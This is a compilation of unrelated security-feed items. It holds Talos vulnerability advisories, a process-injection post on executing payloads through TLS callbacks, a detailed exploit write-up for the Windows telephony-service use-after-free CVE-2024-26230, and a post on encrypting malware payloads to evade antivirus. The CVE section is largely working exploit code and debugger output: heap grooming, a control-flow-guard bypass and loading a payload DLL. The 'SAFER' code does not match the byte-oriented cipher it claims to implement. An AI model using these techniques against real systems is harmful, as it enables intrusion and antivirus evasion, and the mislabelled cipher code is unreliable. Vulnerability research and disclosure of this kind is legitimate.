For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence's website.

Denial-of-service, remote code execution vulnerabilities in TP-Link AC1350 router

Talos researchers recently discovered four vulnerabilities in the TP-Link AC1350 wireless router. The AC1350 is one of many routers TP-Link produces and is designed to be used on home networks.

TALOS-2023-1861 (CVE-2023-49074) is a denial-of-service vulnerability in the TP-Link Device Debug Protocol (TDDP). An attacker could exploit this vulnerability by sending a series of unauthenticated packets to the router, potentially causing a denial of service and forcing the device to reset to its factory settings.

However, the TDDP protocol is only available for roughly 15 minutes after a device reboot.

The TDDP protocol is also vulnerable to TALOS-2023-1862 (CVE-2023-49134 and CVE-2023-49133), a command execution vulnerability that could allow an attacker to execute arbitrary code on the targeted device.

There is another remote code execution vulnerability, TALOS-2023-1888 (CVE-2023-49912, CVE-2023-49909, CVE-2023-49907, CVE-2023-49908, CVE-2023-49910, CVE-2023-49906, CVE-2023-49913, CVE-2023-49911), that is triggered if an attacker sends an authenticated HTTP request to the targeted device. This exploit includes multiple CVEs because an attacker could overflow multiple buffers to cause this condition.

TALOS-2023-1864 (CVE-2023-48724) also exists in the device's web interface functionality. An adversary could exploit this vulnerability by sending an unauthenticated HTTP request to the targeted device, thus causing a denial of service.

Multiple vulnerabilities in OAS Platform

Discovered by Jared Rittle.

Open Automation Software's OAS Platform is an IoT gateway and protocol bus. It allows administrators to connect PLCs, devices, databases and custom apps.

There are two vulnerabilities, TALOS-2024-1950 (CVE-2024-21870) and TALOS-2024-1951 (CVE-2024-22178), that exist in the platform and can lead to arbitrary file creation or overwrite. An attacker can send a sequence of requests to trigger these vulnerabilities.

An adversary could also send a series of requests to exploit TALOS-2024-1948 (CVE-2024-24976), but in this case, the vulnerability leads to a denial of service.

An improper input validation vulnerability (TALOS-2024-1949/CVE-2024-27201) also exists in the OAS Engine User Configuration functionality that could lead to unexpected data in the configuration, including possible decoy usernames that contain characters not usually allowed by the software's configuration.

Arbitrary write vulnerabilities in AMD graphics driver

Discovered by Piotr Bania.

There are two out-of-bounds write vulnerabilities in the AMD Radeon user mode driver for DirectX 11. TALOS-2023-1847 and TALOS-2023-1848 could allow an attacker with access to a malformed shader to potentially achieve arbitrary code execution after causing an out-of-bounds write.

AMD graphics drivers are software that allows graphics processing units (GPUs) to communicate with the operating system.

These vulnerabilities could be triggered from guest machines running virtualization environments to perform a guest-to-host escape. Theoretically, an adversary could also exploit these issues from a web browser. Talos has demonstrated with past, similar vulnerabilities that they could be triggered from a Hyper-V guest using the RemoteFX feature, leading to execution of the vulnerable code on the Hyper-V host.

RemoteTLSCallbackInjection - Utilizing TLS Callbacks To Execute A Payload Without Spawning Any Threads In A Remote Process

By: Zion3R
10 April 2024 at 12:30


This method utilizes TLS callbacks to execute a payload without spawning any threads in a remote process. This method is inspired by Threadless Injection, as RemoteTLSCallbackInjection does not invoke any API calls to trigger the injected payload.

Quick Links

Maldev Academy Home

Maldev Academy Syllabus

Related Maldev Academy Modules

New Module 34: TLS Callbacks For Anti-Debugging

New Module 35: Threadless Injection



Implementation Steps

The PoC follows these steps:

  1. Create a suspended process using the CreateProcessViaWinAPIsW function (e.g. RuntimeBroker.exe).
  2. Fetch the remote process image base address followed by reading the process's PE headers.
  3. Fetch an address to a TLS callback function.
  4. Patch a fixed shellcode (i.e. g_FixedShellcode) with runtime-retrieved values. This shellcode is responsible for restoring both original bytes and memory permission of the TLS callback function's address.
  5. Inject both shellcodes: g_FixedShellcode and the main payload.
  6. Patch the TLS callback function's address and replace it with the address of our injected payload.
  7. Resume process.

The g_FixedShellcode shellcode will then make sure that the main payload executes only once by restoring the original TLS callback's original address before calling the main payload. A TLS callback can execute multiple times across the lifespan of a process, therefore it is important to control the number of times the payload is triggered by restoring the original code path execution to the original TLS callback function.
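To make the PoC steps more concrete, here is a minimal, hedged sketch (not the repository's actual code) of one way the TLS callback array of a remote 64-bit image could be located by walking its PE headers; the first slot of this array is the natural target for the patch described in step 6. The helper name and the omitted error handling are assumptions made purely for illustration.

#include <windows.h>

// Sketch: locate the TLS callback array of a remote 64-bit image.
// Assumes hProcess is the suspended target and imageBase was already
// obtained (e.g. from the remote PEB), as described in steps 1-2 above.
ULONG_PTR FindTlsCallbackArray(HANDLE hProcess, ULONG_PTR imageBase)
{
    IMAGE_DOS_HEADER dos = { 0 };
    IMAGE_NT_HEADERS64 nt = { 0 };

    // Read the DOS and NT headers out of the remote process.
    ReadProcessMemory(hProcess, (LPCVOID)imageBase, &dos, sizeof(dos), NULL);
    ReadProcessMemory(hProcess, (LPCVOID)(imageBase + dos.e_lfanew), &nt, sizeof(nt), NULL);

    DWORD tlsRva = nt.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress;
    if (tlsRva == 0)
        return 0; // the image has no TLS directory to abuse

    // AddressOfCallBacks is a VA pointing to a NULL-terminated array of
    // PIMAGE_TLS_CALLBACK pointers; patching its first slot redirects the
    // loader to the injected payload when the suspended process is resumed.
    IMAGE_TLS_DIRECTORY64 tls = { 0 };
    ReadProcessMemory(hProcess, (LPCVOID)(imageBase + tlsRva), &tls, sizeof(tls), NULL);

    return (ULONG_PTR)tls.AddressOfCallBacks;
}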

Demo

The following image shows our implementation, RemoteTLSCallbackInjection.exe, spawning a cmd.exe as its main payload.



A trick, the story of CVE-2024-26230

10 April 2024 at 09:43

Author: k0shl of Cyber Kunlun

Summary

In April 2024, Microsoft patched a use-after-free vulnerability in the telephony service, which I reported and which was assigned CVE-2024-26230. I have already completed exploitation, employing an interesting trick to bypass XFG mitigation on Windows 11.

Moving forward, in my personal blog posts regarding my vulnerability and exploitation findings, I aim not only to introduce the exploit stage but also to share my thought process on how I completed the exploitation step by step. In this blog post, I will delve into the technique behind the trick and the exploitation of CVE-2024-26230.

Root Cause

The telephony service is an RPC-based service that is not running by default, but it can be activated by invoking the StartServiceW API with normal user privileges.

There are only three functions in the telephony RPC server interface.

long ClientAttach(
    [out][context_handle] void** arg_0, 
    [in]long arg_1, 
    [out]long *arg_2, 
    [in][string] wchar_t* arg_3, 
    [in][string] wchar_t* arg_4);

void ClientRequest(
    [in][context_handle] void* arg_0, 
    [in][out] /* [DBG] FC_CVARRAY */[size_is(arg_2)][length_is(, *arg_3)]char *arg_1/*[] CONFORMANT_ARRAY*/, 
    [in]long arg_2, 
    [in][out]long *arg_3);

void ClientDetach(
    [in][out][context_handle] void** arg_0);
} 

It's easy to understand that the ClientAttach method could create a context handle, the ClientRequest method could process requests using the specified context handle, and the ClientDetach method could release the context handle.

In fact, there is a global variable named "gaFuncs," which serves as a router variable to dispatch to specific dispatch functions within the ClientRequest method. The dispatch function it routes to depends on a value that could be controlled by an attacker.

Within the dispatch functions, numerous objects can be processed. These objects are created by the function NewObject, which inserts them into a global handle table named "ghHandleTable." Each object holds a distinct magic value. When the telephony service references an object, it invokes the function ReferenceObject to compare the magic value and retrieve it from the handle table.

The vulnerability exists in objects that possess the magic value "GOLD", which can be created by the function "GetUIDllName".

void __fastcall GetUIDllName(__int64 a1, int *a2, unsigned int a3, __int64 a4, _DWORD *a5)
{
[...]
if ( object )
      {
        *object = 0x474F4C44; // =====> [a]
        v38 = *(_QWORD *)(contexthandle + 184);
        *((_QWORD *)object + 10) = v38;
        if ( v38 )
          *(_QWORD *)(v38 + 72) = object;
        *(_QWORD *)(contexthandle + 184) = object; // =======> [b]
        a2[8] = object[22];
      }
[...]
}

As shown in the code above, the service stores the magic value 0x474F4C44 ("GOLD") into the object [a] and inserts the object into the context handle object [b]. Typically, most objects are stored within the context handle object, which is initialized in the ClientAttach function. When the service references an object, it checks whether the object is owned by the specified context handle object, as demonstrated in the following code:

    v28 = ReferenceObject(v27, a3, 0x494C4343); // reference the object
    if ( v28
      && (TRACELogPrint(262146i64, "LineProlog: ReferenceObject returned ptCallClient %p", v28),
          *((_QWORD *)v28 + 1) == context_handle_object) // check whether the object belong to context handle object )
    {

However, when the "GOLD" object is freed, it doesn't check whether the object is owned by the context handle. Therefore, I can exploit this by creating two context handles: one that holds the "GOLD" object and another to invoke the dispatch function "FreeDiagInstance" to free the "GOLD" object. Consequently, the "GOLD" object is freed while the original context handle object still holds the "GOLD" object pointer.

__int64 __fastcall FreeDialogInstance(unsigned __int64 a1, _DWORD *a2)
{
[...]
v4 = (_DWORD *)ReferenceObject(a1, (unsigned int)a2[2], 0x474F4C44i64);
  [...]
  if ( *v4 == 0x474F4C44 ) // only check if the magic value is equal to 0x474f4c44, it doesn't check if the object belong to context handle object
[...]
  // free the object
}

This results in the original context handle object holding a dangling pointer. Consequently, the dispatch function "TUISPIDLLCallback" utilizes this dangling pointer, leading to a use-after-free vulnerability. As a result, the telephony service crashes when attempting to reference a virtual function.

__int64 __fastcall TUISPIDLLCallback(__int64 a1, _DWORD *a2, int a3, __int64 a4, _DWORD *a5)
{
[...]
 v7 = (unsigned int)controlledbuffer[2];
  v8 = 0i64;
  v9 = controlledbuffer + 4;
  v10 = controlledbuffer + 5;
  if ( (unsigned int)IsBadSizeOffset(a3, 0, controlledbuffer[5], controlledbuffer[4], 4) )
    goto LABEL_30;
  switch ( controlledbuffer[3] )
  {
[...]
case 3:
      for ( freedbuffer = *(_QWORD *)(context_handle_object + 0xB8); freedbuffer; freedbuffer = *(_QWORD *)(freedbuffer + 80) ) // ===========> context handle object holds the dangling pointer at offset 0xB8
      {
        if ( controlledbuffer[2] == *(_DWORD *)(freedbuffer + 16) ) // compare the value
        {
          v8 = *(__int64 (__fastcall **)(__int64, _QWORD, __int64, _QWORD))(freedbuffer + 32); // reference the virtual function within dangling pointer
          goto LABEL_27;
        }
      }
      break;
[...]

 if ( v8 )
  {
    result = v8(v7, (unsigned int)controlledbuffer[3], a4 + *v9, *v10); // ====> trigger UaF
[...]
}

Note that the controllable buffer in the code above refers to the input buffer of the RPC client, where all content can be controlled by the attacker. This ultimately leads to a crash.

0:001> R
rax=0000000000000000 rbx=0000000000000000 rcx=3064c68a8d720000
rdx=0000000000080006 rsi=0000000000000000 rdi=00000000474f4c44
rip=00007ffcb4b4955c rsp=000000ec0f9bee80 rbp=0000000000000000
 r8=000000ec0f9bea30  r9=000000ec0f9bee90 r10=ffffffffffffffff
r11=000000ec0f9be9e8 r12=0000000000000000 r13=00000203df002b00
r14=00000203df002b00 r15=000000ec0f9bf238
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
tapisrv!FreeDialogInstance+0x7c:
00007ffc`b4b4955c 393e            cmp     dword ptr [rsi],edi ds:00000000`00000000=????????
0:001> K
 # Child-SP          RetAddr               Call Site
00 000000ec`0f9bee80 00007ffc`b4b47295     tapisrv!FreeDialogInstance+0x7c
01 000000ec`0f9bf1e0 00007ffc`b4b4c8bc     tapisrv!CleanUpClient+0x451
02 000000ec`0f9bf2a0 00007ffc`d9b85809     tapisrv!PCONTEXT_HANDLE_TYPE_rundown+0x9c
03 000000ec`0f9bf2e0 00007ffc`d9b840f6     RPCRT4!NDRSRundownContextHandle+0x21
04 000000ec`0f9bf330 00007ffc`d9bcb935     RPCRT4!DestroyContextHandlesForGuard+0xbe
05 000000ec`0f9bf370 00007ffc`d9bcb8b4     RPCRT4!OSF_ASSOCIATION::~OSF_ASSOCIATION+0x5d
06 000000ec`0f9bf3a0 00007ffc`d9bcade4     RPCRT4!OSF_ASSOCIATION::`vector deleting destructor'+0x14
07 000000ec`0f9bf3d0 00007ffc`d9bcad27     RPCRT4!OSF_ASSOCIATION::RemoveConnection+0x80
08 000000ec`0f9bf400 00007ffc`d9b8704e     RPCRT4!OSF_SCONNECTION::FreeObject+0x17
09 000000ec`0f9bf430 00007ffc`d9b861ea     RPCRT4!REFERENCED_OBJECT::RemoveReference+0x7e
0a 000000ec`0f9bf510 00007ffc`d9b97f5c     RPCRT4!OSF_SCONNECTION::ProcessReceiveComplete+0x18e
0b 000000ec`0f9bf610 00007ffc`d9b97e22     RPCRT4!CO_ConnectionThreadPoolCallback+0xbc
0c 000000ec`0f9bf690 00007ffc`d8828f51     RPCRT4!CO_NmpThreadPoolCallback+0x42
0d 000000ec`0f9bf6d0 00007ffc`db34aa58     KERNELBASE!BasepTpIoCallback+0x51
0e 000000ec`0f9bf720 00007ffc`db348d03     ntdll!TppIopExecuteCallback+0x198

Find Primitive

When I discovered this vulnerability, I quickly realized that it could be exploited because I can control the timing of both releasing and using the object.

However, the first challenge of exploitation is that I need an exploit primitive. The Ring 3 world is different from the Ring 0 world. In kernel mode, I could use various objects as primitives, even if they are different types. But in user mode, I can only use objects within the same process. This means that I can't exploit the vulnerability if there isn't a suitable object in the target process.

So, I need to determine whether there is a suitable object in the telephony service. A small tip: I don't even need an 'object.' What I want is just a memory allocation whose size and content I can control.

After reverse engineering, I discovered an interesting primitive. There is a dispatch function named "TRequestMakeCall" that opens the registry key of the telephony service and allocates memory to store key values.

if ( !RegOpenCurrentUser(0xF003Fu, &phkResult) ) // ==========> [a]
  {
    if ( !RegOpenKeyExW(
            phkResult,
            L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities",
            0,
            0x20019u,
            &hKey) )
    {
      GetPriorityList(hKey, L"RequestMakeCall"); // ==========> [b]
      RegCloseKey(hKey);
    }
    
///////////////////////////////////////////
if ( RegQueryValueExW(hKey, lpValueName, 0i64, &Type, 0i64, &cbData) || !cbData ) // =============> [c]
  {
    [...]
  }
  else
  {
    v6 = HeapAlloc(ghTapisrvHeap, 8u, cbData + 2); // ===========> [d]
    v7 = (wchar_t *)v6;
    if ( v6 )
    {
      *(_WORD *)v6 = 34;
      LODWORD(v6) = RegQueryValueExW(hKey, lpValueName, 0i64, &Type, (LPBYTE)v6 + 2, &cbData); // ==============> [e]
      [...]
  }

In the dispatch function "TRequestMakeCall," it first opens the HKCU root key [a] and invokes the GetPriorityList function to obtain the "RequestMakeCall" key value. After checking the key privilege, it's determined that this key can be fully controlled by the current user, meaning I could modify the key value. In the function "GetPriorityList," it first retrieves the type and size of the key, then allocates a heap to store the key value. This implies that if I can control the key value, I can also control both the heap size and the content of the heap.

The default type of "RequestMakeCall" is REG_SZ, but since the current user has full control privilege over it, I can delete the default value and create a REG_BINARY type key value. This allows me to set both the size and content to arbitrary values, making it a useful primitive.

Heap Fengshui

After ensuring there is a suitable primitive, it's time to perform heap feng shui. Because I can control the timing of allocating, releasing, and using the object, it's easy to come up with a layout.

  1. First, I allocate enough "GOLD" objects using the "GetUIDllName" function.
  2. Then, I free some of them to create holes using the "FreeDialogInstance" function.
  3. Next, I allocate a worker "GOLD" object to trigger the use-after-free vulnerability.
  4. After that, I free the worker object with the vulnerability. This time, the worker context handle object still holds the dangling pointer of the worker object.
  5. Following this, I delete the "RequestMakeCall" key value and create a REG_BINARY type key with controlled content. Then, I allocate some key value heaps to ensure they occupy the hole left by the worker object.
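Putting these steps together, the grooming sequence could look roughly like the sketch below. The wrapper names (ClientAttachWrapper, GetUIDllNameReq, FreeDialogInstanceReq, SetRequestMakeCallValue, TRequestMakeCallReq) are hypothetical client-side helpers around the tapisrv RPC calls shown earlier, and the spray counts are placeholders, not values from the actual exploit.

// Hypothetical wrappers around ClientAttach/ClientRequest; illustration only.
void *ClientAttachWrapper(void);
int   GetUIDllNameReq(void *ctx);                   // creates a "GOLD" object
void  FreeDialogInstanceReq(void *ctx, int objId);  // frees a "GOLD" object
void  SetRequestMakeCallValue(const void *data, unsigned long size); // write REG_BINARY key value
void  TRequestMakeCallReq(void *ctx);               // allocates a key-value heap buffer

void GroomAndReclaim(const void *keyValueBytes, unsigned long keyValueSize)
{
    void *hMain = ClientAttachWrapper();   // will end up holding the dangling pointer
    void *hFree = ClientAttachWrapper();   // used only to free the worker object

    for (int i = 0; i < 0x100; i++)        // 1. spray "GOLD" objects
        GetUIDllNameReq(hMain);

    for (int i = 0; i < 0x100; i += 2)     // 2. punch holes
        FreeDialogInstanceReq(hMain, i);

    int worker = GetUIDllNameReq(hMain);   // 3. the worker object

    // 4. free it through the OTHER context handle: the missing ownership check
    //    leaves hMain holding the stale pointer at offset 0xB8
    FreeDialogInstanceReq(hFree, worker);

    // 5. reclaim the hole with attacker-controlled registry key data
    SetRequestMakeCallValue(keyValueBytes, keyValueSize);
    for (int i = 0; i < 0x10; i++)
        TRequestMakeCallReq(hMain);
}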

XFG mitigation

After the final step of the heap feng shui in the previous section, the controlled key value heap occupies the target hole. When I invoke the "TUISPIDLLCallback" function to trigger the "use" step, as in the pseudocode above, the controlled buffer is the input buffer of the RPC interface. If I set the case number to 3, the function compares a magic value with the worker object and then obtains a virtual function address from it, so I only need to set these two values in the content of the registry key value.

    RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", L"RequestMakeCall");
    RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", &hkey);
    BYTE lpbuffer[0x5e] = { 0 };
    *(PDWORD)((ULONG_PTR)lpbuffer + 0xE) = (DWORD)0x40000018;
    *(PULONG_PTR)((ULONG_PTR)lpbuffer + 0x1E) = (ULONG_PTR)jmpaddr; // fake pointer
    RegSetValueExW(hkey, L"RequestMakeCall", 0, REG_BINARY, lpbuffer, 0x5E);

It seems that there is only one step left to complete the exploitation. I can control the address of the virtual function, which means I can control the RIP register. I could use ROP if there were no XFG mitigation. However, XFG prevents the RIP register from jumping to a ROP gadget address, causing an INT 29 exception when the control flow check fails.

Last step, the true challenge

Just like the exploitation I introduced in my previous blog post about CNG key isolation, when I can control the RIP, it's useful to invoke LoadLibrary to load the payload DLL. However, I quickly encountered some challenges this time when attempting to set the virtual function address to the LoadLibrary address.

Let's review the virtual function call in the "TUISPIDLLCallback" dispatch function:

result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF
  1. The first parameter is a DWORD type value which is obtained from a RPC input buffer which could be controlled by client.
  2. The second parameter is also obtained from the RPC input buffer, but it must be a constant value equal to the case number I mentioned in the previous section, which is 3.
  3. The third parameter is a pointer. The buffer is the controlled buffer address with an added offset of 0x3C. Additionally, this pointer will have an offset added to it, which is obtained from the controlled RPC input buffer.
  4. The fourth parameter is a DWORD type that obtained from a controlled RPC input buffer.

It's evident that in order to jump to LoadLibrary to load the payload DLL, the first parameter should be a pointer pointing to the payload DLL path. However, in this situation, it's a DWORD type value.

So I can't use LoadLibrary directly to load the payload DLL; I need to find another way to complete the exploitation. I want to find a function that loads the payload DLL indirectly: because the third parameter is a pointer whose content I can control, I need a function shaped like the following:

func(a1, a2, a3, ...){
[...]
    path = a3;
    LoadLibrary(path);
[...]
}

The limitation in this scenario is that I can't control which DLLs are loaded in the RPC server. Therefore, I can only use functions from DLLs already loaded in the RPC server, and it took some time to look for an eligible function. In the end, I failed to find one.

It seems like we're back to the beginning. I'm reviewing some APIs in MSDN again, hoping to find another scenario.

The trick

After some time, I remembered an interesting API: VirtualAlloc.

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

The first parameter of VirtualAlloc is lpAddress, which can be set to a specified value, and the process will allocate memory at this address.

I noticed that I can allocate memory at a 32-bit address with this function!

The second parameter is a constant value representing the buffer size to allocate; its exact value doesn't matter for my purpose. The last parameter is a controlled DWORD value, which I can set to the desired flProtect value: PAGE_EXECUTE_READWRITE (0x40).

But a new challenge arises with the third parameter.

The third parameter is flAllocationType, and in my scenario, it's a pointer. This implies that the low 32 bits of the pointer should be the flAllocationType. I need to set it to MEM_COMMIT (0x1000) | MEM_RESERVE (0x2000). Although I can control the offset, I don't know the address of the pointer, so I can't set the low 32 bits of the pointer to a specified value. I tried allocating the heap with some random values, but all attempts failed.

Let's review the "use" code again:

result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF
if(!result){
[...]
}
*controlledbuffer = result;
return result;

The virtual function return value will be stored into the controlled buffer, which will then be returned to the client. This means that if I allocate memory using a function such as MIDL_user_allocate, it will return a 64-bit address, but only the low 32 bits of the address will be returned to the client. This will be a useful information disclosure.

But I still can't predict the low 32-bit value of the third parameter when invoking VirtualAlloc. So, I tried increasing the allocation buffer size to find out if there is any regularity. Actually, the maximum size the RPC client can set is larger than 0x40000000. When I set the allocation size to 0x40000000, I found an interesting situation.

I found out that when the allocation size is set to 0x40000000, the low 32 bits of the pointer's address increase linearly, which makes them predictable.

That means, for example, if the leaked low 32 bits are 0xbd700000, I know that if I set the input buffer size to 0x40000000, the next controlled buffer's low 32 bits will be 0xfd800000. Additionally, the offset of the third parameter can't be larger than the input buffer size. Therefore, I need to ensure that the low 32-bit address is larger than 0xc0000000. In this way, after the offset is added, the pointer value exceeds 0x100000000 and its low 32 bits wrap around to a small DWORD, so it's possible to make the third parameter 0x3000 (MEM_COMMIT (0x1000) | MEM_RESERVE (0x2000)).
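As a hedged sketch of that arithmetic (reusing the example values above; the exact step between consecutive 0x40000000-byte allocations is an assumption based on the observed linear growth), choosing the offset could look like this:

// Sketch: pick the RPC offset so that the low 32 bits of (buffer + offset)
// equal MEM_COMMIT | MEM_RESERVE. low32_next is the predicted low 32 bits of
// the next controlled input buffer, derived from the MIDL_user_allocate leak.
unsigned int low32_next = 0xfd800000;                        // predicted from the leak
unsigned long long target = 0x100000000ULL + 0x3000;         // wrap past 4 GiB, land on 0x3000
unsigned int offset = (unsigned int)(target - low32_next);   // must stay below the input buffer size

// With that offset, the hijacked virtual call effectively becomes:
//   VirtualAlloc((LPVOID)0xba000000 /* controlled DWORD          */,
//                3                  /* the constant case number  */,
//                0x3000             /* MEM_COMMIT | MEM_RESERVE  */,
//                0x40               /* PAGE_EXECUTE_READWRITE    */);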

So far, I have performed the heap feng shui and I control the entire content of the heap hole through the controllable registry key value. To bypass the XFG mitigation, I first leak the low 32-bit address by setting the MIDL_user_allocate function address in the key value, and then set the VirtualAlloc function address in the key value. Obviously, it doesn't end once the 32-bit allocation succeeds; I need to invoke "TUISPIDLLCallback" multiple times to complete the XFG bypass. The good news is that I can control the timing of the "use" step, so all I need to do is free the registry key value heap, set a new key value with the target function address, allocate a new key value heap, and use it again.

tapisrv!TUISPIDLLCallback+0x1cc:
00007fff`7c27fecc ff154ee80000    call    qword ptr [tapisrv!_guard_xfg_dispatch_icall_fptr (00007fff`7c28e720)] ds:00007fff`7c28e720={ntdll!LdrpDispatchUserCallTarget (00007fff`afcded40)}
0:007> u rax
KERNEL32!VirtualAllocStub:
00007fff`aeae3bf0 48ff2551110700  jmp     qword ptr [KERNEL32!_imp_VirtualAlloc (00007fff`aeb54d48)]
00007fff`aeae3bf7 cc              int     3
00007fff`aeae3bf8 cc              int     3
00007fff`aeae3bf9 cc              int     3
00007fff`aeae3bfa cc              int     3
00007fff`aeae3bfb cc              int     3
00007fff`aeae3bfc cc              int     3
00007fff`aeae3bfd cc              int     3
0:007> r r8d
r8d=3000
0:007> r r9d
r9d=40
0:007> r rcx
rcx=00000000ba000000
0:007> r rdx
rdx=0000000000000003

According to the debugging information, we can see that every parameter satisfies the requirements. After invoking the VirtualAlloc function, we have successfully allocated a 32-bit address.

0:007> p
tapisrv!TUISPIDLLCallback+0x1d2:
00007fff`7c27fed2 85c0            test    eax,eax
0:007> dq ba000000
00000000`ba000000  00000000`00000000 00000000`00000000
00000000`ba000010  00000000`00000000 00000000`00000000
00000000`ba000020  00000000`00000000 00000000`00000000
00000000`ba000030  00000000`00000000 00000000`00000000
00000000`ba000040  00000000`00000000 00000000`00000000

This means I have successfully controlled the first parameter as a pointer. The next step is to copy the payload DLL path into the 32-bit address. However, I can't use the memcpy function because the second parameter is a constant value, which must be 3. Instead, I decide to use the memcpy_s function, where the second parameter represents the copy length and the third parameter is the source address. I can only copy 3 bytes at a time, but I can invoke it multiple times to complete the path copying.
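As a hedged illustration of what those repeated calls achieve (in the real exploit each call goes through the hijacked virtual call, so the destination, length and source are smuggled in via the RPC input buffer; the path is the one visible in the dump that follows):

#include <string.h>

// Illustration only: copy the payload DLL path into the fixed 32-bit buffer
// three bytes at a time, mirroring the constrained memcpy_s gadget.
static void CopyPathInChunks(void)
{
    wchar_t path[] = L"C:\\Users\\pwn\\AppData\\Roaming\\fakedll.dll";
    unsigned char *dst = (unsigned char *)0xba000000;   // the VirtualAlloc'd 32-bit address
    unsigned char *src = (unsigned char *)path;

    for (size_t off = 0; off < sizeof(path); off += 3) {
        size_t chunk = sizeof(path) - off < 3 ? sizeof(path) - off : 3;
        // The second argument (the destination size) is pinned to 3 by the
        // constant case number, so each call can move at most 3 bytes.
        memcpy_s(dst + off, 3, src + off, chunk);
    }
}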

0:009> dc ba000000
00000000`ba000000  003a0043 0055005c 00650073 00730072  C.:.\.U.s.e.r.s.
00000000`ba000010  0070005c 006e0077 0041005c 00700070  \.p.w.n.\.A.p.p.
00000000`ba000020  00610044 00610074 0052005c 0061006f  D.a.t.a.\.R.o.a.
00000000`ba000030  0069006d 0067006e 0066005c 006b0061  m.i.n.g.\.f.a.k.
00000000`ba000040  00640065 006c006c 0064002e 006c006c  e.d.l.l...d.l.l.

The last remaining step is invoking LoadLibrary to load the payload DLL.

0:009> u
KERNELBASE!LoadLibraryW:
00007fff`ad1f2480 4533c0          xor     r8d,r8d
00007fff`ad1f2483 33d2            xor     edx,edx
00007fff`ad1f2485 e9e642faff      jmp     KERNELBASE!LoadLibraryExW (00007fff`ad196770)
00007fff`ad1f248a cc              int     3
00007fff`ad1f248b cc              int     3
00007fff`ad1f248c cc              int     3
00007fff`ad1f248d cc              int     3
00007fff`ad1f248e cc              int     3
0:009> dc rcx
00000000`ba000000  003a0043 0055005c 00650073 00730072  C.:.\.U.s.e.r.s.
00000000`ba000010  0070005c 006e0077 0041005c 00700070  \.p.w.n.\.A.p.p.
00000000`ba000020  00610044 00610074 0052005c 0061006f  D.a.t.a.\.R.o.a.
00000000`ba000030  0069006d 0067006e 0066005c 006b0061  m.i.n.g.\.f.a.k.
00000000`ba000040  00640065 006c006c 0064002e 006c006c  e.d.l.l...d.l.l.
00000000`ba000050  00000000 00000000 00000000 00000000  ................
00000000`ba000060  00000000 00000000 00000000 00000000  ................
00000000`ba000070  00000000 00000000 00000000 00000000  ................
0:009> k
 # Child-SP          RetAddr               Call Site
00 000000ab`ac97eac8 00007fff`7c27fed2     KERNELBASE!LoadLibraryW
01 000000ab`ac97ead0 00007fff`7c27817a     tapisrv!TUISPIDLLCallback+0x1d2
02 000000ab`ac97eb60 00007fff`afb57f13     tapisrv!ClientRequest+0xba

Malware and cryptography 26: encrypt/decrypt payload via SAFER. Simple C/C++ example.

9 April 2024 at 01:00


Hello, cybersecurity enthusiasts and white hackers!


This post is the result of my own research on trying to evade AV engines by encrypting the payload with another algorithm: SAFER. As usual, while exploring various crypto algorithms, I decided to check what would happen if we apply this one to encrypt/decrypt the payload.

SAFER

SAFER (Secure And Fast Encryption Routine) is a symmetric block cipher designed by James Massey. SAFER K-64 specifically refers to the variant with a 64-bit key size. It's notable for its nonproprietary nature and has been incorporated into some products by Cylink Corp.

SAFER K-64 operates as an iterated block cipher, meaning the same function is applied for a certain number of rounds. Each round utilizes two 64-bit subkeys, and the algorithm exclusively employs operations on bytes. Unlike DES, SAFER K-64 is not a Feistel network.

practical example

For a practical example, here is the step-by-step flow of SAFER-64:

// extract left and right halves of the data block
L = data_ptr[0];
R = data_ptr[1];

// SAFER-64 encryption rounds
for (i = 0; i < ROUNDS; i++) {
  T = R ^ key_ptr[i % 4];
  T = (T << 1) | (T >> 31); // Rotate left by 1 bit
  L ^= (T + R);
  T = L ^ key_ptr[(i % 4) + 4];
  T = (T << 1) | (T >> 31); // Rotate left by 1 bit
  R ^= (T + L);
}

// update the data block with the encrypted values
data_ptr[0] = L;
data_ptr[1] = R;

So, the encryption function looks like this:

void safer_encrypt(unsigned char *data, unsigned char *key) {
  unsigned int *data_ptr = (unsigned int *)data;
  unsigned int *key_ptr = (unsigned int *)key;
  unsigned int L, R, T;
  int i;

  L = data_ptr[0];
  R = data_ptr[1];

  for (i = 0; i < ROUNDS; i++) {
    T = R ^ key_ptr[i % 4];
    T = (T << 1) | (T >> 31);
    L ^= (T + R);
    T = L ^ key_ptr[(i % 4) + 4];
    T = (T << 1) | (T >> 31);
    R ^= (T + L);
  }

  data_ptr[0] = L;
  data_ptr[1] = R;
}

What about decryption logic? The decryption process is not much different from encryption:

// extract left and right halves of the data block
L = data_ptr[0];
R = data_ptr[1];

// SAFER-64 decryption rounds
for (i = ROUNDS - 1; i >= 0; i--) {
  T = L ^ key_ptr[(i % 4) + 4];
  T = (T << 1) | (T >> 31); // Rotate left by 1 bit
  R ^= (T + L);
  T = R ^ key_ptr[i % 4];
  T = (T << 1) | (T >> 31); // Rotate left by 1 bit
  L ^= (T + R);
}

// Update the data block with the decrypted values
data_ptr[0] = L;
data_ptr[1] = R;

Accordingly, the SAFER-64 decryption function looks like this:

void safer_decrypt(unsigned char *data, unsigned char *key) {
  unsigned int *data_ptr = (unsigned int *)data;
  unsigned int *key_ptr = (unsigned int *)key;
  unsigned int L, R, T;
  int i;

  L = data_ptr[0];
  R = data_ptr[1];

  for (i = ROUNDS - 1; i >= 0; i--) {
    T = L ^ key_ptr[(i % 4) + 4];
    T = (T << 1) | (T >> 31);
    R ^= (T + L);
    T = R ^ key_ptr[i % 4];
    T = (T << 1) | (T >> 31);
    L ^= (T + R);
  }

  data_ptr[0] = L;
  data_ptr[1] = R;
}

